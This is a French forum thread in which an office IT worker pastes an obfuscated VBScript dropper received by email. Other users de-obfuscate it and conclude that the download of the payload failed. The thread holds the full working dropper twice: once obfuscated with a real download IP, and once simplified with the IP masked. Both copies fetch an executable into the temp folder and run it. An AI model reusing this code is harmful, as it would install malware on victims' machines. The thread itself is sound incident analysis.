Script VBS reçu par email

[Soltek]

Hello,

 

Malgré notre firewall, antispam et antivirus, une collègue un reçu et lancé un script contenu dans une archive zip.
Je vous copie/colle le contenue :

Dim KDhnYBYFkCfnMjsyxDhPb KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq"If KDhnYBYFkCfnMjsyxDhPb = "GYVknOOhGywVqmXmqbfPJwq" ThenEnd IfWScript.Sleep  4000Dim IDYVbPrSxIOQmVHlhhrMe IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY"If IDYVbPrSxIOQmVHlhhrMe = "wxDxNGcmgbXsKhpRiATSSrY" ThenEnd IfDim pWLDnIbAxcaFeCLyYVoMl pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj"If pWLDnIbAxcaFeCLyYVoMl = "mfKUNJRzFLLpbeRwtxmrRgj" ThenEnd Ifpath = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")Dim jbOpkfGOcOSqeMWQsOtIV jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam"If jbOpkfGOcOSqeMWQsOtIV = "vJieaxacOqWxnvUjZAkSeam" ThenEnd Ifpath = path & "\"Dim bPKzPmlstEgupMlzTGcLE bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM"If bPKzPmlstEgupMlzTGcLE = "gTnMSRmHhzWzyvuTlYyGNuM" ThenEnd IfURL = "http://192.99.19.178/xdde.exe"Dim UBuVzItKFfJxfYuSyMXRp UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu"If UBuVzItKFfJxfYuSyMXRp = "ychzWoRwNLZXDHPuxyeoGnu" ThenEnd IfDJ = "foyoun.exe" Dim GiTlDQmIBtHlTvWlSngxD GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB"If GiTlDQmIBtHlTvWlSngxD = "ldxtdRwqMOVkpklhgtRsxUB" ThenEnd Ifdim GH: Set GH = createobject("Microsoft.XMLHTTP")Dim oCvKtmDggbKnfwaqsfiHn oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz"If oCvKtmDggbKnfwaqsfiHn = "kpcbBajIKTiwpyQfdihoxuz" ThenEnd Ifdim NJ: Set NJ = createobject("Adodb.Stream")Dim XYYujdiLRWsDGyQrMdTdI XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf"If XYYujdiLRWsDGyQrMdTdI = "vEbwhbOSeXaViUcyJSnrOGf" ThenEnd IfGH.Open "GET", URL, FalseDim noJDsEnwMRwvIuMKrDqsQ noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ"If noJDsEnwMRwvIuMKrDqsQ = "FPQwfZtQpANBJFanZwjpGJJ" ThenEnd IfGH.SendDim lJfIDLwdMkgxsqlxCSqdl lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi"If lJfIDLwdMkgxsqlxCSqdl = "ABPauxKipqOKAcFvwbIyiIi" ThenEnd IfDim LvwsgIYDgarbKxryMxqEo LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ"If LvwsgIYDgarbKxryMxqEo = "sMhQFNffWaUwwAAuOdvhCNJ" ThenEnd Ifwith NJDim sIEULnfeEkUwMezeyNsVj sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt"If sIEULnfeEkUwMezeyNsVj = "WWDGYwhefowCeMvXsIZlqFt" ThenEnd If    .type = 1 '//binaryDim EfbFlmGxEemgogWpEexDs EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl"If EfbFlmGxEemgogWpEexDs = "HEpmlRhJSUTZxpeuDWcrSAl" ThenEnd If    .openDim bVARHccOjqvnFoOVovgLe bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj"If bVARHccOjqvnFoOVovgLe = "wctpujUkjdZvWTsjKLKAEJj" ThenEnd If    .write GH.responseBodyDim ROuABfAUaQknyFlzXwkgu ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm"If ROuABfAUaQknyFlzXwkgu = "IHiGcttPUBcEOtDtSwzwZtm" ThenEnd If    .savetofile path &  DJ, 2 '//overwriteDim jBOqyenfPJuctlqaxUrJI jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq"If jBOqyenfPJuctlqaxUrJI = "SHKundUfAztpwFSYZOYuQrq" ThenEnd Ifend withDim zEzFClGHhilWxXYPejjuT zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN"If zEzFClGHhilWxXYPejjuT = "EFeSoMpZcKBvaEActYROrRN" ThenEnd IfDim zUeKUpPqPdbZxcuJwtsvA zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL"If zUeKUpPqPdbZxcuJwtsvA = "AmLzDptYwWTuKWLQGlsoWJL" ThenEnd Iffile = path & DJDim WqltKUVZZcPQsSPXrAioP WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij"If WqltKUVZZcPQsSPXrAioP = "QjJUHlosvNZZkQOVRLunbij" ThenEnd IfSet WshShell = WScript.CreateObject("WScript.Shell")Dim srTHesvHyvDBrVUtHvBgL srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ"If srTHesvHyvDBrVUtHvBgL = "RSiSxLCMbUbtNPgrrbnwZrQ" ThenEnd IfWshShell.Run  chr(34) & file & chr(34)

Elle m'a dit avoir vu une fenêtre noir s'ouvrir et se fermer donc le code s'est bien exécuté. Je ne suis pas dév du tout mais j'ai l'impression qu'il doit essayer d'aller télécharger un .exe et le lancer. Je ne sais pas si cela a fonctionné.
Auriez-vous des pistes d'où je peux chercher s'il y a un problème sur son poste ? Qui est malheureusement encore... en XP (j'avais prévu de lui changer la semaine prochaine en plus >_<).

[Xxxaaavvv]

Code simplifié :

 

WScript.Sleep  4000

path = CreateObject("WScript.Shell").ExpandEnvironmentStrings("%temp%")

path = path & "\"

URL = "http://xxx.xx.xx.xxx/xdde.exe"

DJ = "foyoun.exe" 

dim GH: Set GH = createobject("Microsoft.XMLHTTP")

dim NJ: Set NJ = createobject("Adodb.Stream")

GH.Open "GET", URL, False

GH.Send

 

with NJ

    .type = 1 '//binary

    .open

    .write GH.responseBody

    .savetofile path &  DJ, 2 '//overwrite

end with

file = path & DJ

Set WshShell = WScript.CreateObject("WScript.Shell")

WshShell.Run  chr(34) & file & chr(34)

 

 

 

Donc oui il va chercher un fichier sur le net le télécharge dans le dossier temp et l'execute.

Ta machine est vérolée.

[Soltek]

Merci.

 

Le fichier foyoun.exe faisait 1ko donc je l'ai ouvert avec Notepad++ au cas où et il y avait ça dedans :

<html><head><title> Hôte injoignable </title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head><body bgcolor="#E0E0FF">
<blockquote><h3>Le site que vous souhaitez interroger est actuellement indisponible.
</h3></blockquote>
</body>
</html>

Le site où il voulait récupérer le .exe vérolé est HS donc en fait ça va il ne s'est rien passé.

[Aekyros]

Méfie toi quand même, on ne sait jamais c'est ptet histoire de brouiller les pistes ! ^^

[Soltek]

Je lui change son poste par un neuf demain

 

J'en parlerai à mes collègues dév quand ils seront dispo quand même si jamais ça se reproduit, puis petite note d'info aux secrétaires de faire gaffe aux emails bizarres.